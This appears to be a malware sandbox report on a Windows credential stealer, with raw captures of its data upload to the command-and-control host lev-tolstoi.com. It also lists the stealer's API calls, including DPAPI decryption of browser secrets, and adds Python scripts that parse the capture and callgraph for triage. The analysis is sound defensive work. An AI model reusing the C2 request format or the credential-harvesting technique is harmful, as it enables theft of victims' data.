                                                                                                                                                                                                                                2024-12-26 12:14:32 UTC15331OUTData Raw: 05 22 a6 f6 96 9f c5 81 1d 22 28 d9 c0 ab 2d d9 c7 4d 65 ed e9 33 26 a4 bb 01 b6 95 ab d9 cb 79 fa 59 dc 15 d7 ed 97 97 21 b0 3e fb 37 ef ec 5f 44 a0 63 80 64 08 9d ee e4 9e 87 a3 09 9c c5 c7 b3 ed c4 93 23 a7 e7 28 9a b8 db 4b 6b e1 9d 92 17 ce 38 df cf b1 c0 8b 54 2e 2d df 0c e0 e7 dc 95 bb 2d 73 4c c8 ea cb 45 ad 65 67 ee d5 47 8d 9e 3a a3 9b c9 a1 83 3d 23 e8 42 eb 0b be b5 36 b9 e3 5b f2 0f 7a 16 3e 42 48 f1 1a 40 b1 c6 d7 7e 84 ec c7 c6 5a ea 34 30 0c ed 5a 01 db d0 59 e4 7f 97 20 c6 bb ec 5c 76 a4 8a 34 3c 96 d1 84 fb 1f e8 62 02 26 7e a4 e6 8c 13 7c 07 64 05 83 4b bb 91 80 20 da 1c b4 35 c6 a8 03 7e 7d 60 be b3 30 9f 12 d9 24 7d e0 37 d6 8d ae 11 03 66 2d 1e fb 60 9b 47 b0 17 63 83 2f b7 4d 8e ea 07 09 ea 83 75 85 16 d2 98 81 4c 8c 8f 97 ca 8b cc
                                                                                                                                                                                                                                Data Ascii: ""(-Me3&yY!>7_Dcd#(Kk8T.--sLEegG:=#B6[z>BH@~Z40ZY \v4<b&~|dK 5~}`0$}7f-`Gc/MuL
                                                                                                                                                                                                                                2024-12-26 12:14:32 UTC15331OUTData Raw: 2f 2b 3f d7 9f 57 eb 70 4b b0 ad 57 92 8f d0 bd 2c 9c c4 d3 84 fc 42 1b 09 db 5b 4e bb 4c 5a 26 8e 84 f7 e3 83 dc a1 ec ca 55 b5 f2 9f d8 e2 c7 91 63 f7 cd f4 23 78 a0 37 43 dd 23 23 aa f4 af 44 6e 66 50 e9 33 bf 3f 25 de df 22 33 54 83 de 48 92 e9 bd e2 82 dd bf 33 6d 25 de 9f 2e af a4 a7 08 92 7d 4e ff fe 73 37 04 04 3b fb f9 30 e0 91 72 e6 63 57 64 76 22 f5 f6 bc 26 bb 46 9c eb e9 5f f6 a4 ce bb e2 06 4f cb 61 f5 e8 2b 7d cb 63 a6 90 dd 71 77 fb eb dc 7f bf 57 3c 8e d2 e8 96 ac 13 84 f7 72 bc 19 2c 0c ee d6 aa 78 38 fe fc 56 76 98 71 a4 84 3e 6a b5 b6 16 69 33 e7 d6 7c 27 6f 2d 07 91 89 00 23 0b ed 18 4d 7f cf c8 c3 1a 91 7d 19 43 b6 b3 ec d9 1f 22 ea b4 87 63 e0 73 7b a5 45 ba 4f 1c 71 cf d4 84 51 71 8f dc 5a d6 4e a2 4f 74 28 1c 6c d8 44 f4 81 5d 0d
                                                                                                                                                                                                                                Data Ascii: /+?WpKW,B[NLZ&Uc#x7C##DnfP3?%"3TH3m%.}Ns7;0rcWdv"&F_Oa+}cqwW<r,x8Vvq>ji3|'o-#M}C"cs{EOqQqZNOt(lD]
                                                                                                                                                                                                                                2024-12-26 12:14:32 UTC15331OUTData Raw: cf b6 70 cf 4e c4 1d d8 29 8f 30 5f 61 5e e3 41 54 15 b2 f2 e5 cf 71 d2 48 29 84 c4 71 e1 2f e3 74 fd 13 c7 45 34 1c 61 d9 b9 ab 63 b6 11 84 d1 5a 01 ee 2d 60 f3 d5 58 02 20 38 6f 46 ad d1 16 04 d8 c5 5b 24 fb 78 e4 ef b5 93 b6 d9 e8 98 b5 70 3b b3 fa bb 18 4a da 06 26 66 7c 48 17 a3 d5 8a 48 48 22 b6 32 91 2c e4 ec cf bf 71 f2 c3 7c 1f bf 93 8f c7 46 99 51 98 cf c4 19 e7 b0 79 84 e2 b2 ad 44 e5 a5 af 93 9a ed 8d ab 8a 3a af 76 50 51 11 b7 a5 08 7d e1 ef 0e e3 3d 01 ec 2f 72 e8 68 2b 73 4a bf ed 67 2b e9 c9 2e 99 fb e6 2a 93 e7 7a 72 c9 1d 95 9c 8f c7 74 69 24 df 2d d1 cd 37 07 3a 14 f5 94 f0 89 f5 69 0a 76 18 c2 fd 6f b5 a8 b0 ea 8b 78 8f 01 ea 75 1f b5 65 f8 6b fb 51 84 e7 6c 6a 22 ad a7 71 ab 7e df 24 44 80 15 d3 61 54 18 65 63 6e ac 6e 0f ac 34 2f ce
                                                                                                                                                                                                                                Data Ascii: pN)0_a^ATqH)q/tE4acZ-`X 8oF[$xp;J&f|HHH"2,q|FQyD:vPQ}=/rh+sJg+.*zrti$-7:ivoxuekQlj"q~$DaTecnn4/
                                                                                                                                                                                                                                2024-12-26 12:14:32 UTC15331OUTData Raw: 80 5a 92 44 ad 16 03 37 76 da e5 d4 7b 79 35 f0 8c c9 0e 5d 0c 78 de 29 26 9f 53 3d cd 71 7b d2 5c 7c 84 73 e3 7b ac 14 bc 97 75 20 35 46 02 e0 3b 70 0c 1c 01 df 8d 82 65 b7 be 68 7f 69 e1 65 3a d3 88 e8 72 67 8b 4b 16 28 58 37 b6 53 b8 25 4f f3 18 b0 b4 c8 6e a8 57 59 0b 49 6e 41 12 cb 51 aa 3d 6e 48 2d 65 a5 3e aa 3a 4b 55 5e e8 fe a2 0b 82 54 c9 01 5b 12 e0 c3 ba 99 a0 a1 cc d4 ab 62 be 3c cc 62 e6 f1 e8 8d 53 6f b0 57 86 1a d0 ba 5b f4 90 fe 1e 93 fc 73 25 9a 49 70 84 14 e8 6d c0 03 62 3e 40 89 57 1f a0 2b d1 94 92 4d 14 6f 6a 33 f7 46 19 09 82 55 7b b7 7a 3b 24 4b 70 8b 42 6c 30 36 0f df b1 b5 6b d6 8c 95 2a ea 5a 60 86 82 cb 93 77 50 d3 fb 9a 97 44 a4 c2 26 d5 88 33 22 57 50 32 1a c4 00 e8 ae 9d b7 ff 2c 0f 3b ad 36 6f 05 dd 9d 88 db 14 9b 9e 32 c0
                                                                                                                                                                                                                                Data Ascii: ZD7v{y5]x)&S=q{\|s{u 5F;pehie:rgK(X7S%OnWYInAQ=nH-e>:KU^T[b<bSoW[s%Ipmb>@W+Moj3FU{z;$KpBl06k*Z`wPD&3"WP2,;6o2
2024-12-26 12:14:35 UTC | 1131 bytes | IN
HTTP/1.1 200 OK
Date: Thu, 26 Dec 2024 12:14:35 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
Set-Cookie: PHPSESSID=u7ihldhh1urmlsdnfjq4c3jo3q; expires=Mon, 21 Apr 2025 06:01:13 GMT; Max-Age=9999999; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
X-Frame-Options: DENY
X-Content-Type-Options: nosniff
X-XSS-Protection: 1; mode=block
cf-cache-status: DYNAMIC
vary: accept-encoding
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=sBt%2FxouQpfDAKeajSgIaW%2Bb5FQ8NNGU8fTN4Vys9cO9a4q6vtUXS0dzgoraLyzfYhder59%2FEoTnBWFGL9cNfc0le0qfQRTCvvcHfplufDDViFJYAyfSxIPd2PIBx88GIpfQ%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8f80fdc0de0c424d-EWR
alt-svc: h3=":443"; ma=86400
server-timing: cfL4;desc="?proto=TCP&rtt=1678&min_rtt=1666&rtt_var=649&sent=340&recv=593&lost=0&retrans=0&sent_bytes=2836&recv_bytes=573516&delivery_rate=1655328&cwnd=208&unsent_bytes=0&cid=843d6b1d9f872ec8&ts=2579&x=0"
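The two captures above are the stealer's check-in and upload: the earlier session's reply is a chunked "ok <ip>" acknowledgement, and this session is a multipart POST to /api on lev-tolstoi.com whose first parts carry hwid, pid and lid fields, followed by roughly 570 KB of opaque data. The Python below is an added triage example, not code from the Joe Sandbox report or from the sample; it embeds the report's own hex dump of the body prefix and of the chunked reply, extracts the form fields from the truncated body, decodes the chunked reply, and lists which traits of the request match the shape seen here. The field names, boundary and path come from the capture; the function names and the 100 000-byte upload threshold are my own choices.

```python
import re

# --- Sample input copied from the sandbox report's capture (not synthetic) -----------------

# Request line and headers of the POST to lev-tolstoi.com (275 bytes on the wire).
REQUEST_LINE = "POST /api HTTP/1.1"
REQUEST_HEADERS = {
    "Connection": "Keep-Alive",
    "Content-Type": "multipart/form-data; boundary=21B385563K4",
    "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 "
                  "(KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36",
    "Content-Length": "570977",
    "Host": "lev-tolstoi.com",
}

# Leading bytes of the multipart body as hex-dumped in the report. The dump stops after
# "Cont", in the middle of the fourth part's headers, so the parser must tolerate that.
POST_BODY_PREFIX = bytes.fromhex(
    "2d 2d 32 31 42 33 38 35 35 36 33 4b 34 0d 0a "                        # --21B385563K4
    "43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 "     # Content-Disposition:
    "66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 "  # form-data; name="hwid"
    "0d 0a 0d 0a "
    "41 38 44 45 37 36 35 41 36 42 36 44 44 44 32 42 42 45 42 41 30 43 "
    "36 41 39 37 35 46 31 37 33 33 0d 0a "                                 # A8DE765A6B6DDD2BBEBA0C6A975F1733
    "2d 2d 32 31 42 33 38 35 35 36 33 4b 34 0d 0a "
    "43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 "
    "66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 "     # name="pid"
    "0d 0a 0d 0a 31 0d 0a "                                                # 1
    "2d 2d 32 31 42 33 38 35 35 36 33 4b 34 0d 0a "
    "43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 "
    "66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 "     # name="lid"
    "0d 0a 0d 0a 50 73 46 4b 44 67 2d 2d 70 61 62 6c 6f 0d 0a "           # PsFKDg--pablo
    "2d 2d 32 31 42 33 38 35 35 36 33 4b 34 0d 0a 43 6f 6e 74"            # --21B385563K4 Cont (truncated)
)

# Tail of the chunked reply in the preceding session: "f\r\nok 8.46.123.189\r\n0\r\n\r\n".
RESPONSE_TAIL = bytes.fromhex(
    "66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a 30 0d 0a 0d 0a"
)


def boundary_from_content_type(content_type):
    """Pull the boundary token out of a multipart/form-data Content-Type header."""
    m = re.search(r'boundary="?([^";]+)"?', content_type)
    return m.group(1) if m else None


def parse_multipart_prefix(body, boundary):
    """Return {field name: value} for every complete part of a possibly truncated body.

    A part cut off before its blank header/body separator (the dump ends with "Cont") and
    the closing "--boundary--" marker contain no CRLF CRLF and are skipped, not mis-parsed.
    """
    fields = {}
    for part in body.split(b"--" + boundary.encode())[1:]:
        if b"\r\n\r\n" not in part:
            continue
        head, value = part.split(b"\r\n\r\n", 1)
        name = re.search(rb'name="([^"]+)"', head)
        if name:
            fields[name.group(1).decode()] = value.rstrip(b"\r\n").decode(errors="replace")
    return fields


def decode_chunked(raw):
    """Decode an HTTP/1.1 chunked body and return the joined chunk payloads."""
    out, pos = b"", 0
    while True:
        eol = raw.index(b"\r\n", pos)
        size = int(raw[pos:eol].split(b";")[0], 16)   # chunk-size line; ignore extensions
        pos = eol + 2
        if size == 0:                                   # terminating zero-length chunk
            return out
        out += raw[pos:pos + size]
        pos += size + 2                                 # skip the CRLF that follows the data


def beacon_indicators(request_line, headers, fields):
    """List the traits of a request that match the captured check-in (ordered, for reporting)."""
    method, path = request_line.split(" ")[:2]
    hits = []
    if method == "POST" and path == "/api":
        hits.append("POST /api")
    if headers.get("Content-Type", "").startswith("multipart/form-data"):
        hits.append("multipart body")
    if {"hwid", "pid", "lid"} <= set(fields):
        hits.append("hwid/pid/lid fields")
    if re.fullmatch(r"[0-9A-F]{32}", fields.get("hwid", "")):
        hits.append("32-hex-digit hwid")
    if int(headers.get("Content-Length", "0")) > 100_000:   # threshold is an assumption
        hits.append("large upload (%s bytes)" % headers["Content-Length"])
    return hits


if __name__ == "__main__":
    boundary = boundary_from_content_type(REQUEST_HEADERS["Content-Type"])
    fields = parse_multipart_prefix(POST_BODY_PREFIX, boundary)
    print("form fields:", fields)
    print("C2 reply from earlier session:", decode_chunked(RESPONSE_TAIL))
    print("indicators:", beacon_indicators(REQUEST_LINE, REQUEST_HEADERS, fields))
```

The parser deliberately works on a prefix: in a PCAP you rarely want to reassemble half a megabyte of encrypted upload to learn that the first three parts are the victim identifier, a build/profile number and a campaign tag, and those three are what a detection or an incident ticket needs. The indicator list is a triage aid for this capture, not a general signature; a proxy rule built on it should also key on the Host and the boundary format seen here, since `POST /api` with a multipart body is legitimate traffic on plenty of sites.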



Target ID: 0
Start time: 07:14:09
Start date: 26/12/2024
Path: C:\Users\user\Desktop\MaZjv5XeQi.exe
Wow64 process (32bit): true
Commandline: "C:\Users\user\Desktop\MaZjv5XeQi.exe"
Imagebase: 0x9a0000
File size: 1'847'808 bytes
MD5 hash: 20460F73DDD6DA12A34A1BC6911B0538
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Yara matches:
• Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000003.2209696792.0000000000FE7000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000003.2209553671.0000000000FE6000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000003.2209596373.0000000000F8E000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000003.2209761021.0000000000F91000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000003.2233422671.0000000000F91000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
Reputation: low
Has exited: true


Execution Graph

Execution Coverage: 54.8%
Dynamic/Decrypted Code Coverage: 0%
Signature Coverage: 65.1%
Total number of Nodes: 212
Total number of Limit Nodes: 18

[The execution graph is rendered in the original as a raw node/edge list (node id, address in the 0x9a0000 image, optional API name). Only the API names on its nodes are kept here; node addresses and edges are omitted.]

API calls on the graph's nodes: RtlAllocateHeap, RtlReAllocateHeap, RtlFreeHeap, LdrInitializeThunk, LoadLibraryExW, FreeLibrary, VirtualAlloc, ExitProcess, CoInitializeEx, CoInitializeSecurity, CoSetProxyBlanket, CoUninitialize, SysAllocString, SysFreeString, GetPhysicallyInstalledSystemMemory, GetVolumeInformationW, GetComputerNameExA, RtlExpandEnvironmentStrings, WSAStartup, CryptUnprotectData.

Two of these tie directly to signatures listed for the sample: the CoInitializeEx / CoInitializeSecurity / CoSetProxyBlanket / SysAllocString sequence is the client-side setup for a WMI query, consistent with the Win32_VideoController check flagged above, and CryptUnprotectData is the DPAPI call used to decrypt browser-stored secrets, consistent with the browser credential harvesting flagged above.

Callgraph

• Executed
• Not Executed
• Opacity -> Relevance
• Disassembly available
Nodes (id Function_address):
0 Function_00AAC0AA, 1 Function_009D679F, 2 Function_009CC09E, 3 Function_009A9D1E, 4 Function_009D6095, 5 Function_009CBE95, 6 Function_009A4B10, 7 Function_009AA091, 8 Function_009C1A10, 9 Function_009DE110,
10 Function_009DE40D, 11 Function_00C1A0D3, 12 Function_009DEB88, 13 Function_009ABE0F, 14 Function_009A8600, 15 Function_009AB100, 16 Function_009A8080, 17 Function_00ADA0B6, 18 Function_009C1D00, 19 Function_009AE687,
20 Function_009D9280, 21 Function_009DE080, 22 Function_009BC085, 23 Function_009FC081, 24 Function_009CD7BD, 25 Function_009DDCBF, 26 Function_00A58087, 27 Function_009F9335, 28 Function_009CC8B1, 29 Function_009A9EB7,
30 Function_009E14B0, 31 Function_009DEA29, 32 Function_009D0B2B, 33 Function_009AC1A0, 34 Function_009B1227, 35 Function_009DE0A0, 36 Function_009DC5A0, 37 Function_009D8EA0, 38 Function_009E0D20, 39 Function_009E1320,
40 Function_009E1720, 41 Function_009DC55C, 42 Function_009AC4D9, 43 Function_009D4E58, 44 Function_009D10DA, 45 Function_009AEF53, 46 Function_009DE051, 47 Function_009D2753, 48 Function_009CD84E, 49 Function_009DE34B,
50 Function_009CD34A, 51 Function_009D0ACA, 52 Function_009B57C0, 53 Function_009C7440, 54 Function_009E0340, 55 Function_009D48C2, 56 Function_009ACE45, 57 Function_009ABBC5, 58 Function_009D087D, 59 Function_009ACC7A,
60 Function_009ADE73, 61 Function_009C18F0, 62 Function_009DC570, 63 Function_009AEC77, 64 Function_009D3670, 65 Function_009CD7EE, 66 Function_009AA369, 67 Function_009AEBE9, 68 Function_009D28EB, 69 Function_009AC6ED,
70 Function_009ABFED, 71 Function_009DE967, 72 Function_009AB7E0, 73 Function_009A9F66, 74 Function_009DE760, 75 Function_009E0460, 76 Function_009AC464, 77 Function_009F9FE0

Edges (caller -> callees):
Function_009D679F -> Function_009DE110
Function_009C1A10 -> Function_009E14B0
Function_009DE40D -> Function_009DE110
Function_009DEB88 -> Function_009DE110
Function_009A8600 -> Function_009DE080
Function_009AB100 -> Function_009DE0A0
Function_009C1D00 -> Function_009DE110, Function_009E1320, Function_009DC570
Function_009AE687 -> Function_009D9280
Function_009CC8B1 -> Function_009DE110
Function_009E14B0 -> Function_009DE110
Function_009DEA29 -> Function_009DE110
Function_009B1227 -> Function_009B57C0
Function_009DE0A0 -> Function_009DC570
Function_009DC5A0 -> Function_009DE110, Function_009DC570
Function_009D8EA0 -> Function_009DE110
Function_009E0D20 -> Function_009DE110, Function_009DC570
Function_009E1320 -> Function_009DE110
Function_009E1720 -> Function_009DE110
Function_009B57C0 -> Function_009DE110, Function_009E14B0, Function_009E1320, Function_009E1720
Function_009C7440 -> Function_009DE110, Function_009DC570
Function_009E0340 -> Function_009DE110
Function_009ACE45 -> Function_009AB7E0
Function_009ACC7A -> Function_009C7440
Function_009ADE73 -> Function_009DE110
Function_009C18F0 -> Function_009C1A10
Function_009AA369 -> Function_009AB100
Function_009DE967 -> Function_009DE110
Function_009DE760 -> Function_009DE110
Function_009E0460 -> Function_009DE110, Function_009DC570
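The callgraph above is emitted by the sandbox as one flat token stream in which `<id> Function_<addr>` defines a node and `<caller>-><callee>` is a call edge. The script below is an added example, not part of the Joe Sandbox report: it parses that stream and ranks callees by how many distinct functions call them, which is the quickest way to spot the shared helpers in the dump (here Function_009DE110 and Function_009DC570). The fixture is the report's own callgraph listing for this dump, copied verbatim as constructed input; the regular expression and the ranking are assumptions about the listing format, not a Joe Sandbox API.

```python
"""Parse a Joe Sandbox callgraph listing (flattened node definitions and
'caller->callee' edges) and rank callees by fan-in.  Added example, not
part of the report; the fixture is this page's callgraph listing, copied
as constructed input."""
import re
from collections import defaultdict
from typing import Dict, List, Tuple

# Constructed fixture: the callgraph token stream as printed in the report.
CALLGRAPH_TEXT = (
    "callgraph 0 Function_00AAC0AA 1 Function_009D679F 9 Function_009DE110 1->9 2 Function_009CC09E "
    "3 Function_009A9D1E 4 Function_009D6095 5 Function_009CBE95 6 Function_009A4B10 7 Function_009AA091 "
    "8 Function_009C1A10 30 Function_009E14B0 8->30 10 Function_009DE40D 10->9 11 Function_00C1A0D3 "
    "12 Function_009DEB88 12->9 13 Function_009ABE0F 14 Function_009A8600 21 Function_009DE080 14->21 "
    "15 Function_009AB100 35 Function_009DE0A0 15->35 16 Function_009A8080 17 Function_00ADA0B6 "
    "18 Function_009C1D00 18->9 39 Function_009E1320 18->39 62 Function_009DC570 18->62 "
    "19 Function_009AE687 20 Function_009D9280 19->20 22 Function_009BC085 23 Function_009FC081 "
    "24 Function_009CD7BD 25 Function_009DDCBF 26 Function_00A58087 27 Function_009F9335 "
    "28 Function_009CC8B1 28->9 29 Function_009A9EB7 30->9 31 Function_009DEA29 31->9 "
    "32 Function_009D0B2B 33 Function_009AC1A0 34 Function_009B1227 52 Function_009B57C0 34->52 35->62 "
    "36 Function_009DC5A0 36->9 36->62 37 Function_009D8EA0 37->9 38 Function_009E0D20 38->9 38->62 "
    "39->9 40 Function_009E1720 40->9 41 Function_009DC55C 42 Function_009AC4D9 43 Function_009D4E58 "
    "44 Function_009D10DA 45 Function_009AEF53 46 Function_009DE051 47 Function_009D2753 "
    "48 Function_009CD84E 49 Function_009DE34B 50 Function_009CD34A 51 Function_009D0ACA "
    "52->9 52->30 52->39 52->40 53 Function_009C7440 53->9 53->62 54 Function_009E0340 54->9 "
    "55 Function_009D48C2 56 Function_009ACE45 72 Function_009AB7E0 56->72 57 Function_009ABBC5 "
    "58 Function_009D087D 59 Function_009ACC7A 59->53 60 Function_009ADE73 60->9 61 Function_009C18F0 61->8 "
    "63 Function_009AEC77 64 Function_009D3670 65 Function_009CD7EE 66 Function_009AA369 66->15 "
    "67 Function_009AEBE9 68 Function_009D28EB 69 Function_009AC6ED 70 Function_009ABFED "
    "71 Function_009DE967 71->9 73 Function_009A9F66 74 Function_009DE760 74->9 "
    "75 Function_009E0460 75->9 75->62 76 Function_009AC464 77 Function_009F9FE0"
)

# A node definition is "<id> Function_<hex>"; an edge is "<id>-><id>".  The
# node alternative cannot match an edge because it requires whitespace
# between the number and the name, so one pass over the stream is enough.
TOKEN = re.compile(
    r"(?P<node>\d+)\s+(?P<name>Function_[0-9A-Fa-f]+)"
    r"|(?P<src>\d+)->(?P<dst>\d+)"
)


def parse_callgraph(text: str) -> Tuple[Dict[int, str], List[Tuple[int, int]]]:
    """Return ({node_id: function_name}, [(caller_id, callee_id), ...])."""
    names: Dict[int, str] = {}
    edges: List[Tuple[int, int]] = []
    for m in TOKEN.finditer(text):
        if m.group("node") is not None:
            names[int(m.group("node"))] = m.group("name")
        else:
            edges.append((int(m.group("src")), int(m.group("dst"))))
    return names, edges


def _name(names: Dict[int, str], node_id: int) -> str:
    # Tolerate an edge that references an id the listing never defined.
    return names.get(node_id, f"node_{node_id}")


def fan_in(text: str) -> Dict[str, int]:
    """Callee name -> number of distinct callers (duplicate edges count once)."""
    names, edges = parse_callgraph(text)
    callers = defaultdict(set)
    for src, dst in edges:
        callers[_name(names, dst)].add(_name(names, src))
    return {callee: len(c) for callee, c in callers.items()}


def top_callees(text: str, n: int = 3) -> List[Tuple[str, int]]:
    """Most-shared callees first; ties are broken by name for a stable order."""
    return sorted(fan_in(text).items(), key=lambda kv: (-kv[1], kv[0]))[:n]


def callers_of(text: str, callee: str) -> List[str]:
    """Sorted names of every function with an edge into `callee`."""
    names, edges = parse_callgraph(text)
    return sorted(_name(names, s) for s, d in edges if _name(names, d) == callee)
```

Running `top_callees(CALLGRAPH_TEXT)` on this listing returns Function_009DE110 first with 19 distinct callers and Function_009DC570 second with 6; those two are the helpers to label first when the functions are named in the disassembly, because every other function's behaviour is read through them.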
Strings
Memory Dump Source
• Source File: 00000000.00000002.2287681571.00000000009A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 009A0000, based on PE: true
• Associated: 00000000.00000002.2287663496.00000000009A0000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2287681571.00000000009E5000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2287794609.00000000009F3000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2287815249.00000000009F5000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2287815249.0000000000B78000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2287815249.0000000000C50000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2287815249.0000000000C7C000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2287815249.0000000000C83000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2287815249.0000000000C92000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2288212027.0000000000C93000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2288375348.0000000000E2C000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2288393848.0000000000E2D000.00000080.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_9a0000_MaZjv5XeQi.jbxd
Similarity
• API ID:
• String ID: *,-"$3F&D$_^]\$ntxE$pt}w$qRb`$t~v:$uqrs$w}MI${zdy$~mfQ$S\]$WQ$L4$L4
• API String ID: 0-510280711
• Opcode ID: 080772316a9e7f894a69b248f800a0b7f42901b6ed463d74add844723d3f1b71
• Instruction ID: 288f7ec27c7426ba10c4e4044693701483b0ae1a0500951876f488dafcf9e685
• Opcode Fuzzy Hash: 080772316a9e7f894a69b248f800a0b7f42901b6ed463d74add844723d3f1b71
• Instruction Fuzzy Hash: F2C228B16083508FD7248F24D8927ABB7E6FFD6324F19893CE4D98B295D7349901CB92

Control-flow Graph

• Executed
• Not Executed
control_flow_graph 369 9c1d00-9c1d48 call 9e1320 372 9c1d4e-9c1db8 call 9b4c70 call 9dc540 369->372 373 9c2449-9c2459 369->373 378 9c1dba-9c1dbd 372->378 379 9c1dbf-9c1dd4 378->379 380 9c1dd6-9c1dda 378->380 379->378 381 9c1ddc-9c1de7 380->381 382 9c1dee-9c1e05 381->382 383 9c1de9 381->383 385 9c1e0c-9c1e17 382->385 386 9c1e07-9c1e95 382->386 384 9c1ea8-9c1eab 383->384 390 9c1ead 384->390 391 9c1eaf-9c1eb4 384->391 388 9c1e19-9c1e89 call 9de110 385->388 389 9c1e97-9c1e9c 385->389 386->389 397 9c1e8e-9c1e93 388->397 393 9c1e9e 389->393 394 9c1ea0-9c1ea3 389->394 390->391 395 9c1eba-9c1eca 391->395 396 9c2392-9c23c7 call 9dc570 391->396 393->384 394->381 398 9c1ecc-9c1ee9 395->398 403 9c23c9-9c23cc 396->403 397->389 401 9c1eef-9c1f13 398->401 402 9c207b-9c2083 398->402 405 9c1f17-9c1f1a 401->405 404 9c2085-9c2088 402->404 406 9c23ce-9c23e3 403->406 407 9c23e5-9c23eb 403->407 408 9c208a-9c208e 404->408 409 9c2090-9c20a1 call 9dc540 404->409 410 9c1f1c-9c1f31 405->410 411 9c1f33-9c1f4d call 9c2460 405->411 406->403 413 9c23ed-9c23f3 407->413 414 9c20b5-9c20b7 408->414 428 9c20b1-9c20b3 409->428 429 9c20a3-9c20ac 409->429 410->405 411->402 422 9c1f53-9c1f7c 411->422 417 9c23f5 413->417 418 9c23f7-9c2409 413->418 420 9c20bd-9c20e0 414->420 421 9c2358-9c2363 414->421 425 9c2447 417->425 426 9c240d-9c2413 418->426 427 9c240b 418->427 430 9c20e2-9c20e5 420->430 423 9c2365-9c2375 421->423 424 9c2367-9c236f 421->424 433 9c1f7e-9c1f81 422->433 435 9c2377 423->435 424->435 425->373 436 9c243b-9c243e 426->436 437 9c2415-9c2437 call 9de110 426->437 427->436 428->414 438 9c2379-9c237d 429->438 431 9c211a-9c2157 430->431 432 9c20e7-9c2118 430->432 439 9c215b-9c215e 431->439 432->430 440 9c1fae-9c1fc5 call 9c2460 433->440 441 9c1f83-9c1fac 433->441 435->438 444 9c2440 436->444 445 9c2442-9c2445 436->445 437->436 438->398 443 9c2383-9c2388 438->443 446 9c2177-9c217f 439->446 447 9c2160-9c2175 439->447 457 9c1fd4-9c1feb 440->457 458 9c1fc7-9c1fcf 440->458 441->433 453 9c238e-9c2390 443->453 454 9c245a 443->454 444->425 445->413 451 9c2181-9c218c 446->451 447->439 455 9c218e 451->455 456 9c2193-9c21aa 451->456 453->396 460 9c2259-9c2260 455->460 461 9c21ac-9c2246 456->461 462 9c21b1-9c21be 456->462 463 9c1fed 457->463 464 9c1fef-9c2079 call 9a7f50 call 9b48c0 call 9a7f60 457->464 458->404 465 9c2266-9c2289 460->465 466 9c2262 460->466 468 9c2248-9c224d 461->468 462->468 469 9c21c4-9c223a call 9de110 462->469 463->464 464->404 471 9c228b-9c228e 465->471 466->465 474 9c224f 468->474 475 9c2251-9c2254 468->475 478 9c223f-9c2244 469->478 476 9c22ed-9c2301 471->476 477 9c2290-9c22eb 471->477 474->460 475->451 481 9c2333-9c2336 476->481 482 9c2303-9c2307 476->482 477->471 478->468 484 9c2338-9c2345 call 9dc570 481->484 485 9c2347-9c2349 481->485 483 9c2309-9c2310 482->483 488 9c2320-9c2323 483->488 489 9c2312-9c231e 483->489 487 9c234b-9c234e 484->487 485->487 487->421 493 9c2350-9c2356 487->493 494 9c232b-9c2331 488->494 495 9c2325 488->495 489->483 493->438 494->481 495->494
Strings
Memory Dump Source
• Source File: 00000000.00000002.2287681571.00000000009A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 009A0000, based on PE: true
• Associated: 00000000.00000002.2287663496.00000000009A0000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2287681571.00000000009E5000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2287794609.00000000009F3000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2287815249.00000000009F5000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2287815249.0000000000B78000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2287815249.0000000000C50000.00000040.00000001.01000000.00000003.sdmp
